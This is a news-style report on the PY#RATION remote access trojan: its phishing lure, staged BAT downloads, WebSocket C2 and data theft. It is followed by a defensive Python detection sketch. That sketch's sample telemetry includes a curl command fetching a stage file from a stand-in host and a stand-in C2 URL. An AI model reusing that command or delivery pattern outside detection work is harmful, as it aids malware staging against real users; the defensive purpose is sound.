Threat actors have used a new Python-based malware dubbed PY#RATION RAT to take control of targets and steal data since August last year. Based on reports, the RAT has multiple capabilities that let its operators harvest sensitive information.
This remote access trojan can transfer files from the compromised host to an attacker-controlled command-and-control (C2) server. The RAT uses WebSockets for C2 communication and data exfiltration, a channel that also helps it slip past network security defences.
It can also capture clipboard data, record keystrokes, enumerate installed AV solutions, and run system commands. Furthermore, PY#RATION RAT can extract saved cookies and passwords from web browsers.
PY#RATION also serves as a loader for additional malware strains, such as a Python-based information stealer built by the attackers to steal data from web browsers and crypto wallets.
The PY#RATION RAT has a couple of versions, one of which could bypass security detections.
Investigations revealed that the PY#RATION RAT has versions 1.0 and 1.6. The second version features anti-detection tactics.
The RAT operators initiate their attacks through phishing emails carrying an attached ZIP file that contains two shortcut (LNK) files. These files masquerade as images of a seemingly legitimate UK driver's licence.
The nature of the phishing lures suggests that the intended targets are in the United Kingdom or North America.
Once a target opens the LNK files, two text files are fetched from a remote server and renamed to BAT files. These then run in the background while a decoy image is displayed to distract the target.
The BAT scripts in turn download another set of scripts from a command-and-control server. Those scripts are designed to retrieve additional payloads from the server, such as the Python binary.
The threat actors also disguise the malware as a virtual-assistant system file so that it blends in with legitimate components.
Because the malware is written in Python, it can target operating systems such as macOS, Windows, and Linux. The RAT also uses several techniques, such as Fernet encryption, to evade AV solutions.
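To show how a defender might look for the delivery chain described above (shortcut-launched shell fetching content, a downloaded .txt written back as a .bat, and a Python interpreter opening a WebSocket C2 channel), here is an added triage sketch that is not part of the original article or of any vendor tooling. All event records, file names and hosts are constructed, and the event schema is an assumption standing in for real endpoint telemetry.

```python
from dataclasses import dataclass

@dataclass
class Event:
    kind: str          # "process", "file" or "network"
    image: str = ""    # executable that performed the action
    parent: str = ""   # parent process image (process events)
    cmdline: str = ""  # command line (process events)
    path: str = ""     # file written (file events)
    dest: str = ""     # destination URL (network events)

INTERPRETERS = ("cmd.exe", "powershell.exe")

def shortcut_spawns_shell(ev):
    """Step 1: Explorer (i.e. a double-clicked shortcut) launches a shell
    whose command line reaches out to a URL to fetch stage files."""
    return (ev.kind == "process"
            and ev.parent.lower().endswith("explorer.exe")
            and ev.image.lower().endswith(INTERPRETERS)
            and "http" in ev.cmdline.lower())

def txt_renamed_to_bat(events):
    """Step 2: a downloaded .txt reappears as a .bat with the same stem."""
    stems = {e.path.lower()[:-4] for e in events
             if e.kind == "file" and e.path.lower().endswith(".txt")}
    return [e.path for e in events
            if e.kind == "file" and e.path.lower().endswith(".bat")
            and e.path.lower()[:-4] in stems]

def python_websocket(ev):
    """Step 3: a Python interpreter opens an outbound ws:// or wss:// connection."""
    exe = ev.image.lower().rsplit("\\", 1)[-1]
    return (ev.kind == "network" and exe.startswith("python")
            and ev.dest.lower().startswith(("ws://", "wss://")))

def triage(events):
    """Return (rule, detail) findings in the order the chain would be observed."""
    findings = [("shortcut_shell", e.image) for e in events if shortcut_spawns_shell(e)]
    findings += [("python_websocket", e.dest) for e in events if python_websocket(e)]
    findings += [("txt_to_bat", p) for p in txt_renamed_to_bat(events)]
    return findings

SAMPLE = [  # constructed telemetry, not real indicators from the campaign
    Event("process", image=r"C:\Windows\System32\cmd.exe", parent=r"C:\Windows\explorer.exe",
          cmdline="cmd.exe /c curl http://stage.example.invalid/a.txt -o stage1.txt"),
    Event("file", image=r"C:\Windows\System32\cmd.exe", path=r"C:\Users\u\Temp\stage1.txt"),
    Event("file", image=r"C:\Windows\System32\cmd.exe", path=r"C:\Users\u\Temp\stage1.bat"),
    Event("network", image=r"C:\Users\u\AppData\python.exe", dest="wss://c2.example.invalid/socket"),
]
```

Each rule alone is noisy on a developer workstation; the value is in seeing all three within one session, which is why `triage` reports them together.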
These abilities could make this new RAT a severe threat to different users worldwide.